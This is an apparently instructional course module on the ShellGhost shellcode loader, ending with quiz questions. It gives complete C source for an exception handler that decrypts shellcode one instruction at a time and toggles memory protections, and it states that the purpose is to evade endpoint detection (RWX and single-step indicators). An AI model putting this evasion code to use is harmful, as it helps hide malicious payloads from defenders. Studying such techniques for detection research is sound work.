Difficulty: Intermediate

Module 6: The VEH Handler Implementation

Line by line through the exception handler that re-encrypts, decrypts, toggles RW/RX, and advances one instruction at a time.

Module Objective

Walk through the VEH handler implementation in detail. This module covers how the handler reads ContextRecord->Rip (already adjusted by the kernel) to identify the current position, re-encrypts the previous instruction by overwriting it with 0xCC, decrypts the current instruction using SystemFunction032, toggles memory protection between RW and RX via VirtualProtect, and resumes execution. All of this happens within a single EXCEPTION_BREAKPOINT handler, with no trap flag and no EXCEPTION_SINGLE_STEP. Every line of the handler is explained.

1. Global State Recap

The VEH handler relies on global state that was initialized before execution began. Here is the complete state structure:

// Global state accessible by the VEH handler
static struct {
    PBYTE   exec_base;      // Base address of RW execution buffer
    SIZE_T  exec_size;      // Size of execution buffer
    PBYTE   enc_shellcode;  // Per-instruction encrypted shellcode
    SIZE_T  sc_size;        // Shellcode size

    // Instruction mapping (from ShellGhost_mapping.py)
    CRYPT_BYTES_QUOTA *map; // Array of per-instruction RVA + byte count
    DWORD   num_instr;      // Total number of instructions
    DWORD   current_index;  // Current instruction index

    // RC4 key for SystemFunction032
    BYTE    key[16];        // RC4 encryption key
    USHORT  key_len;        // Key length

    // Tracking state
    INT     prev_index;     // Index of previously executed instruction (-1 if none)

    // SystemFunction032 function pointer
    _SystemFunction032 pSystemFunction032;
} g_ctx;
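The handler trusts the mapping table completely, so it can help to sanity-check the table before execution begins. The following is a minimal sketch, not part of ShellGhost itself: the `QuotaEntry` layout is an assumption (the module only shows the field names `rva` and `quota`), `map_is_contiguous` is a hypothetical helper, and it assumes the map is meant to tile the whole shellcode with no gaps.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumed layout: the module only shows the field names rva and quota. */
typedef struct {
    uint32_t rva;    /* offset of the instruction from the buffer base */
    uint32_t quota;  /* number of bytes the instruction occupies */
} QuotaEntry;

/* Returns 1 when the entries tile [0, sc_size) with no gaps or overlaps
   and every entry is 1 to 15 bytes long (the x86-64 instruction length
   limit); returns 0 otherwise. */
int map_is_contiguous(const QuotaEntry *map, size_t count, size_t sc_size) {
    size_t expected = 0;  /* rva the next entry must start at */
    for (size_t i = 0; i < count; i++) {
        if (map[i].rva != expected) return 0;
        if (map[i].quota == 0 || map[i].quota > 15) return 0;
        expected += map[i].quota;
    }
    return expected == sc_size;
}
```

A table that fails this check would make the handler copy or overwrite the wrong byte ranges, so rejecting it up front is cheaper than debugging a crash inside the exception path.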

2. Handling EXCEPTION_BREAKPOINT

When the CPU hits a 0xCC byte in the execution buffer, the handler must: validate the exception, re-encrypt the previous instruction, decrypt the current instruction, toggle memory protection, and resume. All in a single handler invocation.

LONG CALLBACK GhostVehHandler(PEXCEPTION_POINTERS ep) {
    PEXCEPTION_RECORD rec = ep->ExceptionRecord;
    PCONTEXT ctx = ep->ContextRecord;

    // ---- BREAKPOINT HANDLING ----
    if (rec->ExceptionCode == EXCEPTION_BREAKPOINT) {
        DWORD old_protect;

        // Step 1: Get the address of the 0xCC byte.
        // The kernel (KiDispatchException) already decremented RIP by 1,
        // so ContextRecord->Rip points directly at the 0xCC byte.
        PBYTE cc_addr = (PBYTE)ctx->Rip;

        // Step 2: Validate - is this 0xCC in our execution buffer?
        if (cc_addr < g_ctx.exec_base ||
            cc_addr >= g_ctx.exec_base + g_ctx.exec_size) {
            return EXCEPTION_CONTINUE_SEARCH;  // Not ours
        }

        // Step 3: Toggle memory to RW for writing
        VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
                        PAGE_READWRITE, &old_protect);

        // Step 4: Re-encrypt the PREVIOUS instruction (if any)
        if (g_ctx.prev_index >= 0) {
            CRYPT_BYTES_QUOTA *prev = &g_ctx.map[g_ctx.prev_index];
            // Write 0xCC back over previous instruction's bytes
            memset(g_ctx.exec_base + prev->rva, 0xCC, prev->quota);
        }

        // Step 5: Decrypt the CURRENT instruction
        CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];
        // Copy encrypted bytes to execution buffer
        memcpy(g_ctx.exec_base + curr->rva,
               g_ctx.enc_shellcode + curr->rva, curr->quota);
        // Decrypt in place using SystemFunction032 (RC4)
        UNICODE_STRING data = {
            (USHORT)curr->quota, (USHORT)curr->quota,
            (PWSTR)(g_ctx.exec_base + curr->rva) };
        UNICODE_STRING key = {
            g_ctx.key_len, g_ctx.key_len,
            (PWSTR)g_ctx.key };
        g_ctx.pSystemFunction032(&data, &key);

        // Step 6: Toggle memory to RX for execution
        VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
                        PAGE_EXECUTE_READ, &old_protect);

        // Step 7: Update tracking state
        g_ctx.prev_index = g_ctx.current_index;
        g_ctx.current_index++;

        // Rip already points to the decrypted instruction
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    // Not our exception
    return EXCEPTION_CONTINUE_SEARCH;
}

Step-by-Step Breakdown

Step | Operation | Why
1 | cc_addr = ctx->Rip | The kernel already decremented RIP by 1 for EXCEPTION_BREAKPOINT. No manual adjustment needed.
2 | Range check against exec_base | Ensures we only process breakpoints from our shellcode buffer, not from debuggers or other code.
3 | VirtualProtect to RW | The page is currently RX (executable). We need RW to write decrypted bytes.
4 | Re-encrypt previous instruction | Writes 0xCC back over the bytes of the previously executed instruction, restoring the "ghost" state.
5 | Decrypt current instruction via SystemFunction032 | Copies encrypted bytes from the data buffer and decrypts them in place using RC4.
6 | VirtualProtect to RX | Toggles the page back to executable (RX) so the CPU can run the decrypted instruction. Avoids the RWX IoC.
7 | Update tracking indices | Records the current instruction as "previous" for the next handler invocation. Advances to the next instruction index.
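The range check in step 2 can be modeled in isolation. This is a portable sketch with a hypothetical helper name (`addr_in_buffer`), not the handler's own code. It compares the offset from the base instead of computing `base + size`, which is a defensive variation that stays correct even if that sum would wrap around.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 when addr lies in the half-open range [base, base + size),
   0 otherwise. Comparing the offset (addr - base) against size avoids
   ever forming base + size, so the check cannot be fooled by overflow. */
int addr_in_buffer(uintptr_t addr, uintptr_t base, size_t size) {
    return addr >= base && (addr - base) < size;
}
```

For a 16-byte buffer at 0x1000, addresses 0x1000 through 0x100F are accepted and 0x1010 is rejected, matching the `>=` comparison on the upper bound in the handler.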

3. The One-Exception Model

ShellGhost uses a one-exception-per-instruction model. There is no trap flag usage and no EXCEPTION_SINGLE_STEP handling. The key insight is that after executing a decrypted instruction, the CPU naturally hits the next 0xCC byte in the buffer, which triggers another EXCEPTION_BREAKPOINT. The handler for that next breakpoint re-encrypts the previous instruction before decrypting the current one.

Why No Trap Flag?

Many assume ShellGhost needs the trap flag (TF) to know when an instruction finishes executing. In reality, the 0xCC-filled buffer already provides this signal naturally. When the CPU finishes executing the decrypted instruction and advances to the next byte, it finds another 0xCC and raises EXCEPTION_BREAKPOINT. This breakpoint is the signal that the previous instruction has completed. No trap flag, no EXCEPTION_SINGLE_STEP — just a clean sequence of EXCEPTION_BREAKPOINT events, one per instruction.
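The cycle can be traced with a pure in-memory model. The sketch below is an illustration under stated assumptions, not the real handler: nothing is executed, decryption is replaced by a plain copy from a cleartext array, the code is assumed to be straight-line (no branches), and `QuotaEntry`, `visible_bytes`, and `simulate_cycle` are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define INT3 0xCC

typedef struct { uint32_t rva; uint32_t quota; } QuotaEntry; /* assumed layout */

/* Counts the bytes in buf that are not the 0xCC filler. */
static size_t visible_bytes(const uint8_t *buf, size_t n) {
    size_t count = 0;
    for (size_t i = 0; i < n; i++)
        if (buf[i] != INT3) count++;
    return count;
}

/* Models one handler invocation per instruction over a 0xCC-filled buffer.
   Returns the number of simulated breakpoint events and stores the largest
   number of non-0xCC bytes ever present in *max_visible. */
size_t simulate_cycle(const uint8_t *plain, const QuotaEntry *map, size_t count,
                      uint8_t *buf, size_t size, size_t *max_visible) {
    size_t events = 0;
    int prev = -1;                 /* index of the previously revealed entry */
    memset(buf, INT3, size);       /* initial "ghost" state */
    *max_visible = 0;
    for (size_t i = 0; i < count; i++) {
        events++;                  /* the CPU reached the 0xCC at map[i].rva */
        if (prev >= 0)             /* cover the previous instruction again */
            memset(buf + map[prev].rva, INT3, map[prev].quota);
        /* reveal the current instruction (stand-in for copy + decrypt) */
        memcpy(buf + map[i].rva, plain + map[i].rva, map[i].quota);
        size_t v = visible_bytes(buf, size);
        if (v > *max_visible) *max_visible = v;
        prev = (int)i;
    }
    return events;
}
```

With the bytes `48 89 E5`, `90`, `48 31 C0` mapped as three entries, the model raises three events and never exposes more than three bytes at once, which is the property the one-exception model relies on. The visibility count is only exact when the cleartext itself contains no 0xCC bytes.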

Advantage: Simpler and Stealthier

By avoiding the trap flag entirely, ShellGhost sidesteps detection vectors tied to single-stepping: monitoring that watches for or counts EXCEPTION_SINGLE_STEP events, and the doubled exception rate that a two-exception model would produce. The one-exception model generates half as many exceptions as a breakpoint+single-step approach.

4. The RIP Adjustment Explained

A common misconception is that the VEH handler must manually subtract 1 from RIP for EXCEPTION_BREAKPOINT. Here is the actual behavior:

Before INT3 executes:
  Memory:  [0xCC] [0xCC] [0xCC] ...
  RIP:     0x1000  (pointing at the first 0xCC)

CPU executes 0xCC (INT3):
  CPU internally advances RIP to 0x1001 (past the 1-byte INT3)
  Traps to kernel via IDT vector 3

Kernel (KiDispatchException):
  For EXCEPTION_BREAKPOINT specifically, the kernel decrements RIP by 1
  RIP is set back to 0x1000 before dispatching to user-mode

VEH handler receives:
  ContextRecord->Rip = 0x1000  (already adjusted by kernel)
  ExceptionAddress   = 0x1000  (points to the 0xCC)
  No manual RIP adjustment needed!

VEH handler:
  Decrypts instruction at 0x1000 (e.g., "48 89 E5" = mov rbp, rsp)
  Toggles to RX, returns EXCEPTION_CONTINUE_EXECUTION

CPU resumes at RIP = 0x1000:
  Memory:  [0x48] [0x89] [0xE5] [0xCC] ...
  Executes "mov rbp, rsp" (3 bytes), advances RIP to 0x1003
  Hits 0xCC at 0x1003 -> next EXCEPTION_BREAKPOINT

The Kernel Does the Work

This kernel-level RIP adjustment is specific to EXCEPTION_BREAKPOINT (0x80000003). The Windows kernel (KiDispatchException) decrements the saved RIP by 1 before dispatching the exception to user-mode handlers. This is a well-known Windows kernel behavior that debuggers rely on. ShellGhost uses ContextRecord->Rip directly, without any subtraction.

5. Per-Instruction Decryption via CRYPT_BYTES_QUOTA

ShellGhost knows exactly how many bytes each instruction occupies because this information was pre-computed by ShellGhost_mapping.py. The handler uses the CRYPT_BYTES_QUOTA struct to decrypt precisely the right number of bytes:

// Decrypt the current instruction using mapping data
CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];

// Copy encrypted bytes from data buffer to execution buffer
memcpy(g_ctx.exec_base + curr->rva,
       g_ctx.enc_shellcode + curr->rva,
       curr->quota);

// Decrypt in place using SystemFunction032
UNICODE_STRING data_str = {
    (USHORT)curr->quota,
    (USHORT)curr->quota,
    (PWSTR)(g_ctx.exec_base + curr->rva)
};
UNICODE_STRING key_str = {
    g_ctx.key_len, g_ctx.key_len,
    (PWSTR)g_ctx.key
};
g_ctx.pSystemFunction032(&data_str, &key_str);

// The exact bytes of this instruction are now decrypted in place
// The handler knows the exact byte count from curr->quota

Precise Decryption Surface

Because the CRYPT_BYTES_QUOTA struct records the exact byte count of each instruction, ShellGhost decrypts exactly the number of bytes needed — no more, no less. The decryption surface at any instant is exactly one instruction (1–15 bytes). After the instruction executes and the next breakpoint handler runs, those bytes are overwritten with 0xCC.
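Because the handler makes a fresh SystemFunction032 call with the same key for every instruction, each instruction is effectively its own independent RC4 stream. The sketch below uses a textbook RC4 as a portable stand-in for SystemFunction032 (an assumption made so the example runs anywhere; `rc4_apply` is a hypothetical name) to show the property this depends on: applying the cipher twice with the same key restores the original bytes.

```c
#include <stddef.h>
#include <stdint.h>

/* Textbook RC4 applied in place to data[0..len). key_len must be nonzero.
   The key schedule is rebuilt on every call, so each call is an
   independent stream; calling it twice with the same key is a round trip. */
void rc4_apply(const uint8_t *key, size_t key_len, uint8_t *data, size_t len) {
    uint8_t s[256];
    for (int i = 0; i < 256; i++) s[i] = (uint8_t)i;

    /* Key-scheduling algorithm */
    uint8_t j = 0;
    for (int i = 0; i < 256; i++) {
        j = (uint8_t)(j + s[i] + key[(size_t)i % key_len]);
        uint8_t t = s[i]; s[i] = s[j]; s[j] = t;
    }

    /* Pseudo-random generation: XOR the keystream into the data */
    uint8_t a = 0, b = 0;
    for (size_t n = 0; n < len; n++) {
        a = (uint8_t)(a + 1);
        b = (uint8_t)(b + s[a]);
        uint8_t t = s[a]; s[a] = s[b]; s[b] = t;
        data[n] ^= s[(uint8_t)(s[a] + s[b])];
    }
}
```

Since the keystream restarts for each call, a per-instruction scheme must encrypt each `quota`-sized chunk separately at build time; encrypting the whole buffer as one stream would not decrypt correctly chunk by chunk.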

6. API Calls from Shellcode

When the shellcode calls a Windows API (e.g., call rax where rax points to a function in kernel32.dll), execution leaves the execution buffer. The handler needs no special case for this. The API executes at full native speed. When the API returns (via ret), execution returns to the shellcode buffer at the next instruction. That byte is 0xCC, so EXCEPTION_BREAKPOINT fires again and the cycle resumes naturally.

API Calls Are Free

Because ShellGhost uses only EXCEPTION_BREAKPOINT (no trap flag), API calls outside the execution buffer run at full native speed without any exception overhead. The cycle resumes automatically when the API returns and the CPU hits the next 0xCC in the buffer. This is a significant advantage over a trap-flag-based approach, which would generate single-step exceptions through the entire API call chain.
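The difference in exception volume can be estimated with a back-of-the-envelope model. This sketch is illustrative only: the function names are hypothetical, and the trap-flag variant assumes a design in which TF is re-armed after every single-step, including inside API code, which is the worst case described above.

```c
#include <stdint.h>

/* Breakpoint-only model: one exception per shellcode instruction.
   Instructions executed inside APIs raise nothing. */
uint64_t exceptions_breakpoint_only(uint64_t sc_instr, uint64_t api_instr) {
    (void)api_instr;  /* API code runs without exceptions in this model */
    return sc_instr;
}

/* Hypothetical breakpoint + trap-flag model with TF left armed across
   API calls: one breakpoint and one single-step per shellcode
   instruction, plus one single-step per instruction executed in APIs. */
uint64_t exceptions_with_trap_flag(uint64_t sc_instr, uint64_t api_instr) {
    return 2 * sc_instr + api_instr;
}
```

For 100 shellcode instructions that trigger 50,000 instructions of API code, the first model gives 100 exceptions and the second gives 50,200, so the API portion dominates the cost as soon as any nontrivial API is called.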

7. Complete Handler Assembly

LONG CALLBACK ShellGhostHandler(PEXCEPTION_POINTERS ep) {
    PEXCEPTION_RECORD rec = ep->ExceptionRecord;
    PCONTEXT ctx = ep->ContextRecord;
    DWORD old_protect;

    // ======= BREAKPOINT: Re-encrypt prev, decrypt current =======
    if (rec->ExceptionCode == EXCEPTION_BREAKPOINT) {
        // Rip already points at the 0xCC (kernel adjusted)
        PBYTE cc_addr = (PBYTE)ctx->Rip;

        // Boundary check
        if (cc_addr < g_ctx.exec_base ||
            cc_addr >= g_ctx.exec_base + g_ctx.exec_size)
            return EXCEPTION_CONTINUE_SEARCH;

        // Toggle to RW for writing
        VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
                        PAGE_READWRITE, &old_protect);

        // Re-encrypt previously executed instruction
        if (g_ctx.prev_index >= 0) {
            CRYPT_BYTES_QUOTA *prev = &g_ctx.map[g_ctx.prev_index];
            memset(g_ctx.exec_base + prev->rva, 0xCC, prev->quota);
        }

        // Decrypt current instruction via SystemFunction032
        CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];
        memcpy(g_ctx.exec_base + curr->rva,
               g_ctx.enc_shellcode + curr->rva, curr->quota);
        UNICODE_STRING data = {
            (USHORT)curr->quota, (USHORT)curr->quota,
            (PWSTR)(g_ctx.exec_base + curr->rva) };
        UNICODE_STRING key = {
            g_ctx.key_len, g_ctx.key_len,
            (PWSTR)g_ctx.key };
        g_ctx.pSystemFunction032(&data, &key);

        // Toggle to RX for execution
        VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
                        PAGE_EXECUTE_READ, &old_protect);

        // Advance instruction index
        g_ctx.prev_index = g_ctx.current_index;
        g_ctx.current_index++;

        // Rip already correct, resume execution
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    return EXCEPTION_CONTINUE_SEARCH;
}

Knowledge Check

Q1: Why does the ShellGhost handler NOT subtract 1 from ContextRecord->Rip?

A) Because INT3 does not advance RIP
B) Because x64 addresses are already correct
C) Because ShellGhost uses hardware breakpoints instead
D) Because the Windows kernel (KiDispatchException) already decrements RIP by 1 before dispatching to user-mode

Q2: How does ShellGhost avoid the RWX memory indicator of compromise (IoC)?

A) It uses PAGE_NOACCESS memory
B) It allocates memory as RWX but hides the allocation
C) It allocates as PAGE_READWRITE and toggles to PAGE_EXECUTE_READ via VirtualProtect before execution
D) It writes shellcode to a legitimate DLL's .text section

Q3: What happens when the shellcode calls a Windows API that lives outside the execution buffer?

A) The handler raises an access violation
B) The API runs at full native speed; when it returns, the next 0xCC triggers a new breakpoint and the cycle resumes
C) The API call fails because of the VEH handler
D) The shellcode must decrypt API addresses manually